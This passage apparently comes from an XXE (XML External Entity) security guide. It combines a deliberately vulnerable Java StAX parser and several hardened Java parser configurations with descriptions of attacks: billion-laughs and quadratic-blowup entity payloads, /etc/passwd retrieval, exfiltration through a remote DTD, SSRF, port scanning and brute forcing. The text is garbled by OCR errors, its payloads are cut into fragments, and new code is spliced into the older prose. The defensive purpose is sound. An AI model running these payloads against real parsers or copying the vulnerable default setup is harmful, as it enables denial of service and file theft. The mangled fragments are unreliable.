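    // Returns the concatenated character data, or null if the document is rejected.
    public static String extractText(String xml) {
        final StringBuilder text = new StringBuilder();
        try {
            SAXParserFactory factory = SAXParserFactory.newInstance();
            // Reject DOCTYPE declarations outright.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // Defense in depth: never resolve external entities.
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            SAXParser parser = factory.newSAXParser();
            parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler() {
                @Override
                public void characters(char[] ch, int start, int length) {
                    text.append(ch, start, length);
                }
            });
            return text.toString();
        } catch (Exception e) {
            // Discard anything collected before the error.
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println(extractText("<contact><firstname>John</firstname></contact>"));
    }
}
```

Returning null on failure makes sure that text collected before the parser stopped is never handed to the caller.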
XXE USING STAX
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLStreamReader;
import javax.xml.stream.XMLInputFactory;
import java.io.File;
import java.io.FileReader;
import java.io.FileInputStream;

public class parseDocument {
  public static void main(String[] args) {
    try {
      // Vulnerable: the factory is used with its default settings.
      XMLInputFactory xmlif = XMLInputFactory.newInstance();
      FileReader fr = new FileReader("contacts.xml");
      File file = new File("contacts.xml");
      XMLStreamReader xmlfer = xmlif.createXMLStreamReader("contacts.xml",
          new FileInputStream(file));
      int eventType = xmlfer.getEventType();
      while (xmlfer.hasNext()) {
        eventType = xmlfer.next();
        if (xmlfer.hasText()) {
          System.out.print(xmlfer.getText());
        }
      }
      fr.close();
    } catch (Exception e) {
      e.printStackTrace();
    }
  }
}
The previous code produces the following output:
$ java parseDocument
&B;">
&A;
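For the StAX reader shown earlier, DTD processing and external entity resolution can be switched off through standard XMLInputFactory properties. This is a hedged sketch: SafeStaxParser and extractText are hypothetical names, and how a reference to an entity that is no longer declared is reported (an exception or an unexpanded reference) depends on the StAX implementation, so the method treats any error as a rejection.

```java
import java.io.StringReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;

// Hypothetical hardened counterpart to the StAX example.
public class SafeStaxParser {

    // Returns the concatenated character data, or null if parsing fails.
    public static String extractText(String xml) {
        try {
            XMLInputFactory factory = XMLInputFactory.newInstance();
            // Do not process DTDs and do not resolve external entities.
            factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
            factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
            XMLStreamReader reader = factory.createXMLStreamReader(new StringReader(xml));
            StringBuilder text = new StringBuilder();
            while (reader.hasNext()) {
                // Collect only character data, never DTD or entity reference events.
                if (reader.next() == XMLStreamConstants.CHARACTERS) {
                    text.append(reader.getText());
                }
            }
            reader.close();
            return text.toString();
        } catch (Exception e) {
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println(extractText("<contact><firstname>John</firstname></contact>"));
    }
}
```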
Quadratic Blowup
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one
very large entity and refers to it as many times as possible, resulting in a quadratic expansion
(O(n^2)).
The result of the following attack will be 100,000 x 100,000 characters in memory.
]>
&A;&A;&A;&A;...(100,000 &A;'s)...&A;&A;&A;&A;&A;
Billion Laughs
When an XML parser tries to resolve the entities included within the following code, it will
cause the application to start consuming all of the available memory until the process crashes.
This is an example XML document with an embedded DTD schema including the attack:
<!ENTITY LOL "LOL">
<!ENTITY LOL1 "&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;">
<!ENTITY LOL2 "&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;&LOL1;">
<!ENTITY LOL3 "&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;&LOL2;">
&LOL9;
The entity LOL9 will be resolved as the 10 entities defined in LOL8; then each of these entities will
be resolved in LOL7 and so on. Finally, the CPU and/or memory will be affected by parsing the 3 x
10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash.
‘The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that
€@ SOAP processor can reject any SOAP message that contains a DTD. Despite this specification,
certain SCAP implementations did parse D1D schemas within SOAP messages.
The following exempleillustrates a case where the parser isnot following the specification,
enabling a reference to a DTD ina SCAP message:
<?XML VERSION="1.0" ENCODING="UTF-8"?>
<!ENTITY LOL1 "&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;&LOL;">
<!ENTITY LOL2 "...&LOL1;&LOL1;&LOL1;&LOL1;">
FOO
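A processor that wants to follow the SOAP rule can refuse any message carrying a DOCTYPE declaration. The following sketch assumes a Xerces-derived parser such as the one bundled with the JDK, which recognises the disallow-doctype-decl feature; the class and method names are hypothetical.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class DoctypeRejectingParser {

    // Feature identifier understood by Xerces-derived parsers.
    static final String DISALLOW_DOCTYPE =
            "http://apache.org/xml/features/disallow-doctype-decl";

    // Returns true when the message parses, false when the parser refuses it.
    static boolean accepts(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setNamespaceAware(true);
            // Any DOCTYPE declaration now causes a fatal parse error.
            factory.setFeature(DISALLOW_DOCTYPE, true);
            factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return true;
        } catch (SAXException e) {
            return false;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String envelope = "<soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">"
                + "<soap:Body/></soap:Envelope>";
        String withDtd = "<!DOCTYPE soap:Envelope [<!ENTITY LOL \"LOL\">]>" + envelope;
        System.out.println("plain envelope accepted: " + accepts(envelope));
        System.out.println("envelope with DTD accepted: " + accepts(withDtd));
    }
}
```

Because the check happens when the DOCTYPE is encountered, no entity defined in the DTD is ever expanded.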
Reflected File Retrieval
Consider the following example code of an XXE:
<?xml version="1.0" encoding="ISO-8859-1"?>
]>
&xxe;
The previous XML defines an entity named xxe, which is in fact the contents of /etc/passwd,
which will be expanded within the includeme tag. If the parser allows references to external
entities, it might include the contents of that file in the XML response or in the error output.
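When DTDs cannot be rejected outright, external entities can be switched off while internal ones keep working. This is a minimal sketch, assuming a parser that honours the standard SAX feature identifiers for external general and parameter entities (the JDK's built-in parser does); the class and method names and the file URI in the usage example are hypothetical.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class ExternalEntityHardening {

    // Parses the document with external entities disabled and returns the
    // text content of the root element.
    static String rootText(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
            factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
            Document doc = factory.newDocumentBuilder()
                    .parse(new InputSource(new StringReader(xml)));
            return doc.getDocumentElement().getTextContent();
        } catch (SAXException | ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        // Hypothetical target; the parser is expected to skip it without reading it.
        String xxe = "<!DOCTYPE includeme [<!ENTITY xxe SYSTEM \"file:///nonexistent-xxe-demo\">]>"
                + "<includeme>&xxe;</includeme>";
        System.out.println("text with external entity: [" + rootText(xxe) + "]");
    }
}
```

With these features disabled the reference to xxe is skipped rather than resolved, so the file is never opened and nothing from it can be reflected in a response or an error message.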
Server Side Request Forgery
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema,
which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc.
SSRF has been used to retrieve remote files, to prove an XXE when you cannot reflect back the file,
to perform port scanning, or to perform brute force attacks on internal networks.
EXTERNAL DNS RESOLUTION
Sometimes it is possible to induce the application to perform server-side DNS lookups of arbitrary
domain names. This is one of the simplest forms of SSRF, but requires the attacker to analyze the
DNS traffic. Burp has a plugin that checks for this attack.
EXTERNAL CONNECTION
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to
establish remote connections:
%xxe;
]>
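Outbound connections of this kind can be blocked at the parser level. The sketch below assumes a JAXP 1.5 or later implementation (such as the one in current JDKs), where setting the ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_SCHEMA properties to an empty string denies every protocol; the class and method names and the URIs are hypothetical.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class ExternalAccessRestriction {

    // Returns true when the parser refuses the document.
    static boolean isRejected(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // An empty protocol list means no external DTD, entity, or schema may be fetched.
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
            factory.newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        // Hypothetical attacker-controlled location (documentation address range).
        String probe = "<!DOCTYPE r [<!ENTITY % xxe SYSTEM \"http://192.0.2.1/evil.dtd\"> %xxe;]><r/>";
        System.out.println("connection attempt rejected: " + isRejected(probe));
    }
}
```

Unlike skipping the entity silently, this configuration turns the attempt into a parse error, which also makes probing visible in application logs.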
FILE RETRIEVAL WITH PARAMETER ENTITIES
Parameter entities allow for the retrieval of content using URL references. Consider the following
malicious XML document:
<?xml version="1.0" encoding="utf-8"?>
%dtd;
]>
&send;
Here the DTD defines two external parameter entities: file loads a local file, and dtd loads a
remote DTD. The remote DTD should contain something like this:
<?xml version="1.0" encoding="UTF-8"?>
">
%all;
The second DTD causes the system to send the contents of the file back to the attacker's server
as a parameter of the URL.
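The exfiltration described above depends on the parser fetching the remote DTD. One way to interrupt that step, sketched here under the assumption of a standard JAXP DocumentBuilder, is to install an EntityResolver that refuses every external identifier. The class and method names are hypothetical, and the file URI stands in for the attacker's remote DTD.

```java
import java.io.IOException;
import java.io.StringReader;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

final class DenyAllEntityResolver {

    // Returns true when parsing was aborted by the resolver or another SAX error.
    static boolean isRejected(String xml) {
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            // The resolver is consulted before any external DTD or entity is
            // opened; throwing here aborts the parse without fetching anything.
            builder.setEntityResolver((publicId, systemId) -> {
                throw new SAXException("External entity blocked: " + systemId);
            });
            builder.parse(new InputSource(new StringReader(xml)));
            return false;
        } catch (SAXException e) {
            return true;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String doc = "<!DOCTYPE r [<!ENTITY % dtd SYSTEM \"file:///nonexistent-demo.dtd\"> %dtd;]><r/>";
        System.out.println("remote DTD load rejected: " + isRejected(doc));
    }
}
```

A stricter or looser policy is possible, for example resolving a short allow-list of known DTDs from local copies, but a deny-all resolver is the simplest starting point.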
PORT SCANNING
The amount and type of information will depend on the type of implementation. Responses can be
classified as follows, ranking from easy to complex:
1) Complete Disclosure: The simplest and most unusual scenario. With complete disclosure you
can clearly see what's going on by receiving the complete responses from the server being queried.
You have an exact representation of what happened when connecting to the remote host.
2) Error-based: If you are unable to see the response from the remote server, you may be able to
use the error response. Consider a web service leaking details on what went wrong in the SOAP
Fault element when trying to establish a connection:
java.io.IOException: Server returned HTTP response code: 401 for URL:
http://192.168.1.7:80
at
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1
at
com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEnti
3) Timeout-based: Timeouts could occur when connecting to open or closed ports depending on
the schema and the underlying implementation. If the timeouts occur while you are trying to
connect to a closed port (which may take one minute), the time of response when connected to a
valid port will be very quick (one second, for example). The differences between open and closed
ports become quite clear.
4) Time-based: Sometimes differences between closed and open ports are very subtle. The only
way to know the status of a port with certainty would be to take multiple measurements of the time
required to reach each host; then analyze the average time for each port to determine the status
of each port. This type of attack will be difficult to accomplish when performed in higher latency
networks.
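The error-based case above relies on the service echoing parser exceptions to the caller. A simple countermeasure, sketched here with hypothetical class and method names, is to log the detailed exception on the server and return only a generic message with a correlation identifier.

```java
import java.io.IOException;
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

final class FaultSanitizer {

    private static final Logger LOG = Logger.getLogger(FaultSanitizer.class.getName());

    // Logs the full exception server-side and returns a message that is safe
    // to place in a SOAP Fault: it carries no host, port, or stack details.
    static String clientFault(Throwable cause) {
        String incidentId = UUID.randomUUID().toString();
        LOG.log(Level.WARNING, "XML processing failed, incident " + incidentId, cause);
        return "XML processing failed (incident " + incidentId + ")";
    }

    public static void main(String[] args) {
        Throwable leak = new IOException(
                "Server returned HTTP response code: 401 for URL: http://192.168.1.7:80");
        System.out.println(clientFault(leak));
    }
}
```

This removes the error channel but not the timing channel; response-time differences are only avoided when the parser never attempts the connection in the first place.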
BRUTE FORCING
Once an attacker confirms that it is possible to perform a port scan, performing a brute force
attack is a matter of embedding the username and password as part of the URI scheme (http, ftp,
etc.). For example the following:
-
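Where external identifiers must be allowed at all, an application can at least refuse those that carry credentials. The following is a minimal sketch of such a check using java.net.URI; the class and method names are hypothetical, and the check is meant to run inside whatever entity resolver or validation step the application already uses.

```java
import java.net.URI;
import java.net.URISyntaxException;

final class SystemIdPolicy {

    // Returns true when the system identifier embeds user information
    // (for example "user:password@host") or cannot be parsed as a URI.
    static boolean hasEmbeddedCredentials(String systemId) {
        try {
            String authority = new URI(systemId).getRawAuthority();
            // Checking the raw authority also covers hosts that java.net.URI
            // does not parse as server-based authorities.
            return authority != null && authority.indexOf('@') >= 0;
        } catch (URISyntaxException e) {
            return true; // treat unparsable identifiers as suspicious
        }
    }

    public static void main(String[] args) {
        System.out.println(hasEmbeddedCredentials("http://username:password@example.com:8080"));
        System.out.println(hasEmbeddedCredentials("http://example.com/schema.dtd"));
    }
}
```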